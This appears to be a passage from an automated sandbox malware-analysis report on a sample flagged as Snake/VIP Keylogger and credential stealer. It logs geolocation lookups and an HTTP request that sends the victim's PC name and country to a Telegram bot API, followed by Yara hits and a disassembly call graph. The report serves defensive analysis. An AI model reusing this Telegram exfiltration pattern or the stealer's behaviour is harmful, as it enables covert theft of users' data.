                                              CF-RAY: 8c91d9ad59918c71-EWR
                                              2024-09-26 08:23:09 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.449742188.114.96.34433152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 08:23:10 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:10 UTC677INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:10 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3822
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WpK7kzXB5R6Ajomm5y2r5bb%2BDbazytIqizqZb7STE202DOJRohzc%2BBNqsjzPtXtSEmq5WgnaU8tDp%2FuTQy1NoBMY%2BeeqWJqj9s6M2F9SiVv4N7j4KPQNDJDQbFiXxk3qklbL7w8D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d9b40b8d4399-EWR
                                              2024-09-26 08:23:10 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.449744188.114.96.34433152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 08:23:11 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              2024-09-26 08:23:11 UTC669INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:11 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3823
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WP0VRQaYNJLScSVOc6b5w3gyUNlots2gqOhNeGcZ0PYJEzKDkupfeDjdZqoCCINeD5tSzmva3N83VK9XZpNZuUsOqUcD4WCDJS7oTr7Y17ReZp9zYhYRxf8kR3oRksv2IcYLLvM"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d9bb0f3242ee-EWR
                                              2024-09-26 08:23:11 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.449746188.114.96.34433152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 08:23:12 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                              Host: reallyfreegeoip.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:13 UTC685INHTTP/1.1 200 OK
                                              Date: Thu, 26 Sep 2024 08:23:12 GMT
                                              Content-Type: application/xml
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              access-control-allow-origin: *
                                              vary: Accept-Encoding
                                              Cache-Control: max-age=86400
                                              CF-Cache-Status: HIT
                                              Age: 3824
                                              Last-Modified: Thu, 26 Sep 2024 07:19:28 GMT
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IEh8U4EXJZwn3DzC3rgkFioc%2Bf%2B%2F4UlqvWdEA4C32xbL%2BEK%2FClhc%2BvcJOsxm0jYOuWNXmyZmKK%2BUZ7gUWQFDwbQlK4RyZoTWSmz1z8JuNgytcNaaAWRdeSfyOqefNy%2B58CyOyEy4"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Server: cloudflare
                                              CF-RAY: 8c91d9c1eaf50f65-EWR
                                              2024-09-26 08:23:13 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                              Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                              2024-09-26 08:23:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.449747149.154.167.2204433152C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 08:23:13 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:965543%0D%0ADate%20and%20Time:%2026/09/2024%20/%2014:19:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20965543%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                              Host: api.telegram.org
                                              Connection: Keep-Alive
                                              2024-09-26 08:23:13 UTC344INHTTP/1.1 404 Not Found
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 08:23:13 GMT
                                              Content-Type: application/json
                                              Content-Length: 55
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 08:23:13 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:04:22:56
                                              Start date:26/09/2024
                                              Path:C:\Users\user\Desktop\CMR_7649.EXE.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\CMR_7649.EXE.exe"
                                              Imagebase:0x400000
                                              File size:1'237'203 bytes
                                              MD5 hash:B686BC08D9EC68D1746859235ECB70FD
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.1698345470.0000000003760000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:1
                                              Start time:04:23:00
                                              Start date:26/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\CMR_7649.EXE.exe"
                                              Imagebase:0xda0000
                                              File size:45'984 bytes
                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4109106307.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4110039811.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4110039811.0000000003099000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:3.5%
                                                Dynamic/Decrypted Code Coverage:0.4%
                                                Signature Coverage:8.8%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:37
                                                execution_graph 84245 4010e0 84248 401100 84245->84248 84247 4010f8 84249 401113 84248->84249 84250 401182 84249->84250 84252 401120 84249->84252 84253 401184 84249->84253 84254 40114c 84249->84254 84251 40112c DefWindowProcW 84250->84251 84251->84247 84252->84251 84307 401000 Shell_NotifyIconW _memcpy_s 84252->84307 84286 401250 84253->84286 84256 401151 84254->84256 84257 40119d 84254->84257 84261 401219 84256->84261 84262 40115d 84256->84262 84259 4011a3 84257->84259 84260 42afb4 84257->84260 84258 401193 84258->84247 84259->84252 84271 4011b6 KillTimer 84259->84271 84272 4011db SetTimer RegisterWindowMessageW 84259->84272 84302 40f190 10 API calls 84260->84302 84261->84252 84265 401225 84261->84265 84263 401163 84262->84263 84264 42b01d 84262->84264 84268 42afe9 84263->84268 84269 40116c 84263->84269 84264->84251 84306 4370f4 52 API calls 84264->84306 84318 468b0e 74 API calls _memcpy_s 84265->84318 84304 40f190 10 API calls 84268->84304 84269->84252 84274 401174 84269->84274 84270 42b04f 84308 40e0c0 84270->84308 84301 401000 Shell_NotifyIconW _memcpy_s 84271->84301 84272->84258 84279 401204 CreatePopupMenu 84272->84279 84303 45fd57 65 API calls _memcpy_s 84274->84303 84279->84247 84280 42afe4 84280->84258 84281 42b00e 84305 401a50 331 API calls 84281->84305 84282 4011c9 PostQuitMessage 84282->84247 84285 42afdc 84285->84251 84285->84280 84287 401262 _memcpy_s 84286->84287 84288 4012e8 84286->84288 84319 401b80 84287->84319 84288->84258 84290 40128c 84291 4012d1 KillTimer SetTimer 84290->84291 84292 4012bb 84290->84292 84293 4272ec 84290->84293 84291->84288 84296 4012c5 84292->84296 84297 42733f 84292->84297 84294 4272f4 Shell_NotifyIconW 84293->84294 84295 42731a Shell_NotifyIconW 84293->84295 84294->84291 84295->84291 84296->84291 84298 427393 Shell_NotifyIconW 84296->84298 84299 427348 Shell_NotifyIconW 84297->84299 84300 42736e Shell_NotifyIconW 84297->84300 84298->84291 84299->84291 84300->84291 84301->84282 84302->84258 84303->84285 84304->84281 84305->84250 84306->84250 84307->84270 84310 40e0e7 _memcpy_s 84308->84310 84309 40e142 84312 40e184 84309->84312 84417 4341e6 63 API calls __wcsicoll 84309->84417 84310->84309 84311 42729f DestroyIcon 84310->84311 84311->84309 84314 40e1a0 Shell_NotifyIconW 84312->84314 84315 4272db Shell_NotifyIconW 84312->84315 84316 401b80 54 API calls 84314->84316 84317 40e1ba 84316->84317 84317->84250 84318->84280 84320 401b9c 84319->84320 84340 401c7e 84319->84340 84341 4013c0 84320->84341 84323 42722b LoadStringW 84326 427246 84323->84326 84324 401bb9 84346 402160 84324->84346 84360 40e0a0 84326->84360 84327 401bcd 84329 427258 84327->84329 84330 401bda 84327->84330 84364 40d200 52 API calls 2 library calls 84329->84364 84330->84326 84331 401be4 84330->84331 84359 40d200 52 API calls 2 library calls 84331->84359 84334 427267 84335 42727b 84334->84335 84337 401bf3 _memcpy_s _wcscpy _wcsncpy 84334->84337 84365 40d200 52 API calls 2 library calls 84335->84365 84339 401c62 Shell_NotifyIconW 84337->84339 84338 427289 84339->84340 84340->84290 84366 4115d7 84341->84366 84347 426daa 84346->84347 84348 40216b _wcslen 84346->84348 84404 40c600 84347->84404 84351 402180 84348->84351 84352 40219e 84348->84352 84350 426db5 84350->84327 84403 403bd0 52 API calls moneypunct 84351->84403 84354 4013a0 52 API calls 84352->84354 84356 4021a5 84354->84356 84355 402187 _memmove 84355->84327 84357 426db7 84356->84357 84358 4115d7 52 API calls 84356->84358 84358->84355 84359->84337 84361 40e0b2 84360->84361 84362 40e0a8 84360->84362 84361->84337 84416 403c30 52 API calls _memmove 84362->84416 84364->84334 84365->84338 84368 4115e1 _malloc 84366->84368 84369 4013e4 84368->84369 84372 4115fd std::exception::exception 84368->84372 84380 4135bb 84368->84380 84377 4013a0 84369->84377 84370 41163b 84395 4180af 46 API calls std::exception::operator= 84370->84395 84372->84370 84394 41130a 51 API calls __cinit 84372->84394 84373 411645 84396 418105 RaiseException 84373->84396 84376 411656 84378 4115d7 52 API calls 84377->84378 84379 4013a7 84378->84379 84379->84323 84379->84324 84381 413638 _malloc 84380->84381 84385 4135c9 _malloc 84380->84385 84402 417f77 46 API calls __getptd_noexit 84381->84402 84382 4135d4 84382->84385 84397 418901 46 API calls __NMSG_WRITE 84382->84397 84398 418752 46 API calls 8 library calls 84382->84398 84399 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84382->84399 84385->84382 84386 4135f7 RtlAllocateHeap 84385->84386 84389 413624 84385->84389 84392 413622 84385->84392 84386->84385 84387 413630 84386->84387 84387->84368 84400 417f77 46 API calls __getptd_noexit 84389->84400 84401 417f77 46 API calls __getptd_noexit 84392->84401 84394->84370 84395->84373 84396->84376 84397->84382 84398->84382 84400->84392 84401->84387 84402->84387 84403->84355 84405 40c619 84404->84405 84406 40c60a 84404->84406 84405->84350 84406->84405 84409 4026f0 84406->84409 84408 426d7a _memmove 84408->84350 84410 426873 84409->84410 84411 4026ff 84409->84411 84412 4013a0 52 API calls 84410->84412 84411->84408 84413 42687b 84412->84413 84414 4115d7 52 API calls 84413->84414 84415 42689e _memmove 84414->84415 84415->84408 84416->84361 84417->84312 84418 40bd20 84419 428194 84418->84419 84420 40bd2d 84418->84420 84421 40bd43 84419->84421 84422 4281bc 84419->84422 84424 4281b2 84419->84424 84428 40bd37 84420->84428 84441 4531b1 85 API calls 5 library calls 84420->84441 84440 45e987 86 API calls moneypunct 84422->84440 84439 40b510 VariantClear 84424->84439 84430 40bd50 84428->84430 84429 4281ba 84431 426cf1 84430->84431 84432 40bd63 84430->84432 84451 44cde9 52 API calls _memmove 84431->84451 84442 40bd80 84432->84442 84435 40bd73 84435->84421 84436 426cfc 84437 40e0a0 52 API calls 84436->84437 84438 426d02 84437->84438 84439->84429 84440->84420 84441->84428 84443 40bd8e 84442->84443 84444 40bdb7 _memmove 84442->84444 84443->84444 84445 40bded 84443->84445 84446 40bdad 84443->84446 84444->84435 84448 4115d7 52 API calls 84445->84448 84452 402f00 84446->84452 84449 40bdf6 84448->84449 84449->84444 84450 4115d7 52 API calls 84449->84450 84450->84444 84451->84436 84453 402f10 84452->84453 84454 402f0c 84452->84454 84455 4115d7 52 API calls 84453->84455 84456 4268c3 84453->84456 84454->84444 84457 402f51 moneypunct _memmove 84455->84457 84457->84444 84458 425ba2 84463 40e360 84458->84463 84460 425bb4 84479 41130a 51 API calls __cinit 84460->84479 84462 425bbe 84464 4115d7 52 API calls 84463->84464 84465 40e3ec GetModuleFileNameW 84464->84465 84480 413a0e 84465->84480 84467 40e421 _wcsncat 84483 413a9e 84467->84483 84470 4115d7 52 API calls 84471 40e45e _wcscpy 84470->84471 84486 40bc70 84471->84486 84475 40e4a9 84475->84460 84476 401c90 52 API calls 84478 40e4a1 _wcscat _wcslen _wcsncpy 84476->84478 84477 4115d7 52 API calls 84477->84478 84478->84475 84478->84476 84478->84477 84479->84462 84505 413801 84480->84505 84535 419efd 84483->84535 84487 4115d7 52 API calls 84486->84487 84488 40bc98 84487->84488 84489 4115d7 52 API calls 84488->84489 84490 40bca6 84489->84490 84491 40e4c0 84490->84491 84547 403350 84491->84547 84493 40e4cb RegOpenKeyExW 84494 427190 RegQueryValueExW 84493->84494 84495 40e4eb 84493->84495 84496 4271b0 84494->84496 84497 42721a RegCloseKey 84494->84497 84495->84478 84498 4115d7 52 API calls 84496->84498 84497->84478 84499 4271cb 84498->84499 84554 43652f 52 API calls 84499->84554 84501 4271d8 RegQueryValueExW 84502 4271f7 84501->84502 84504 42720e 84501->84504 84503 402160 52 API calls 84502->84503 84503->84504 84504->84497 84506 41381a 84505->84506 84507 41389e 84505->84507 84506->84507 84518 41388a 84506->84518 84527 419e30 46 API calls __wcsnicmp 84506->84527 84508 4139e8 84507->84508 84509 413a00 84507->84509 84532 417f77 46 API calls __getptd_noexit 84508->84532 84534 417f77 46 API calls __getptd_noexit 84509->84534 84512 4139ed 84533 417f25 10 API calls __wcsnicmp 84512->84533 84515 41396c 84515->84507 84516 413967 84515->84516 84519 41397a 84515->84519 84516->84467 84517 413929 84517->84507 84520 413945 84517->84520 84529 419e30 46 API calls __wcsnicmp 84517->84529 84518->84507 84526 413909 84518->84526 84528 419e30 46 API calls __wcsnicmp 84518->84528 84531 419e30 46 API calls __wcsnicmp 84519->84531 84520->84507 84520->84516 84522 41395b 84520->84522 84530 419e30 46 API calls __wcsnicmp 84522->84530 84526->84515 84526->84517 84527->84518 84528->84526 84529->84520 84530->84516 84531->84516 84532->84512 84533->84516 84534->84516 84536 419f13 84535->84536 84537 419f0e 84535->84537 84544 417f77 46 API calls __getptd_noexit 84536->84544 84537->84536 84543 419f2b 84537->84543 84541 40e454 84541->84470 84542 419f18 84545 417f25 10 API calls __wcsnicmp 84542->84545 84543->84541 84546 417f77 46 API calls __getptd_noexit 84543->84546 84544->84542 84545->84541 84546->84542 84548 403367 84547->84548 84549 403358 84547->84549 84550 4115d7 52 API calls 84548->84550 84549->84493 84551 403370 84550->84551 84552 4115d7 52 API calls 84551->84552 84553 40339e 84552->84553 84553->84493 84554->84501 84555 416454 84592 416c70 84555->84592 84557 416460 GetStartupInfoW 84558 416474 84557->84558 84593 419d5a HeapCreate 84558->84593 84560 4164cd 84561 4164d8 84560->84561 84677 41642b 46 API calls 3 library calls 84560->84677 84594 417c20 GetModuleHandleW 84561->84594 84564 4164de 84565 4164e9 __RTC_Initialize 84564->84565 84678 41642b 46 API calls 3 library calls 84564->84678 84613 41aaa1 GetStartupInfoW 84565->84613 84569 416503 GetCommandLineW 84626 41f584 GetEnvironmentStringsW 84569->84626 84572 416513 84632 41f4d6 GetModuleFileNameW 84572->84632 84575 41651d 84576 416528 84575->84576 84680 411924 46 API calls 3 library calls 84575->84680 84636 41f2a4 84576->84636 84579 41652e 84580 416539 84579->84580 84681 411924 46 API calls 3 library calls 84579->84681 84650 411703 84580->84650 84583 416541 84585 41654c __wwincmdln 84583->84585 84682 411924 46 API calls 3 library calls 84583->84682 84654 40d6b0 84585->84654 84588 41657c 84684 411906 46 API calls _doexit 84588->84684 84591 416581 __close 84592->84557 84593->84560 84595 417c34 84594->84595 84596 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84594->84596 84685 4178ff 49 API calls _free 84595->84685 84598 417c87 TlsAlloc 84596->84598 84601 417cd5 TlsSetValue 84598->84601 84602 417d96 84598->84602 84599 417c39 84599->84564 84601->84602 84603 417ce6 __init_pointers 84601->84603 84602->84564 84686 418151 InitializeCriticalSectionAndSpinCount 84603->84686 84605 417d91 84694 4178ff 49 API calls _free 84605->84694 84607 417d2a 84607->84605 84687 416b49 84607->84687 84610 417d76 84693 41793c 46 API calls 4 library calls 84610->84693 84612 417d7e GetCurrentThreadId 84612->84602 84614 416b49 __calloc_crt 46 API calls 84613->84614 84625 41aabf 84614->84625 84615 41ac6a GetStdHandle 84620 41ac34 84615->84620 84616 416b49 __calloc_crt 46 API calls 84616->84625 84617 41acce SetHandleCount 84624 4164f7 84617->84624 84618 41ac7c GetFileType 84618->84620 84619 41abb4 84619->84620 84621 41abe0 GetFileType 84619->84621 84622 41abeb InitializeCriticalSectionAndSpinCount 84619->84622 84620->84615 84620->84617 84620->84618 84623 41aca2 InitializeCriticalSectionAndSpinCount 84620->84623 84621->84619 84621->84622 84622->84619 84622->84624 84623->84620 84623->84624 84624->84569 84679 411924 46 API calls 3 library calls 84624->84679 84625->84616 84625->84619 84625->84620 84625->84624 84625->84625 84627 41f595 84626->84627 84628 41f599 84626->84628 84627->84572 84628->84628 84704 416b04 84628->84704 84630 41f5bb _memmove 84631 41f5c2 FreeEnvironmentStringsW 84630->84631 84631->84572 84633 41f50b _wparse_cmdline 84632->84633 84634 416b04 __malloc_crt 46 API calls 84633->84634 84635 41f54e _wparse_cmdline 84633->84635 84634->84635 84635->84575 84637 41f2bc _wcslen 84636->84637 84639 41f2b4 84636->84639 84638 416b49 __calloc_crt 46 API calls 84637->84638 84641 41f2e0 _wcslen 84638->84641 84639->84579 84640 41f336 84711 413748 84640->84711 84641->84639 84641->84640 84643 416b49 __calloc_crt 46 API calls 84641->84643 84644 41f35c 84641->84644 84647 41f373 84641->84647 84710 41ef12 46 API calls __wcsnicmp 84641->84710 84643->84641 84645 413748 _free 46 API calls 84644->84645 84645->84639 84717 417ed3 84647->84717 84649 41f37f 84649->84579 84651 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84650->84651 84653 411750 __IsNonwritableInCurrentImage 84651->84653 84736 41130a 51 API calls __cinit 84651->84736 84653->84583 84655 42e2f3 84654->84655 84656 40d6cc 84654->84656 84737 408f40 84656->84737 84658 40d707 84741 40ebb0 84658->84741 84661 40d737 84744 411951 84661->84744 84666 40d751 84756 40f4e0 SystemParametersInfoW SystemParametersInfoW 84666->84756 84668 40d75f 84757 40d590 GetCurrentDirectoryW 84668->84757 84670 40d767 SystemParametersInfoW 84671 40d794 84670->84671 84672 40d78d FreeLibrary 84670->84672 84673 408f40 VariantClear 84671->84673 84672->84671 84674 40d79d 84673->84674 84675 408f40 VariantClear 84674->84675 84676 40d7a6 84675->84676 84676->84588 84683 4118da 46 API calls _doexit 84676->84683 84677->84561 84678->84565 84683->84588 84684->84591 84685->84599 84686->84607 84689 416b52 84687->84689 84690 416b8f 84689->84690 84691 416b70 Sleep 84689->84691 84695 41f677 84689->84695 84690->84605 84690->84610 84692 416b85 84691->84692 84692->84689 84692->84690 84693->84612 84694->84602 84696 41f683 84695->84696 84702 41f69e _malloc 84695->84702 84697 41f68f 84696->84697 84696->84702 84703 417f77 46 API calls 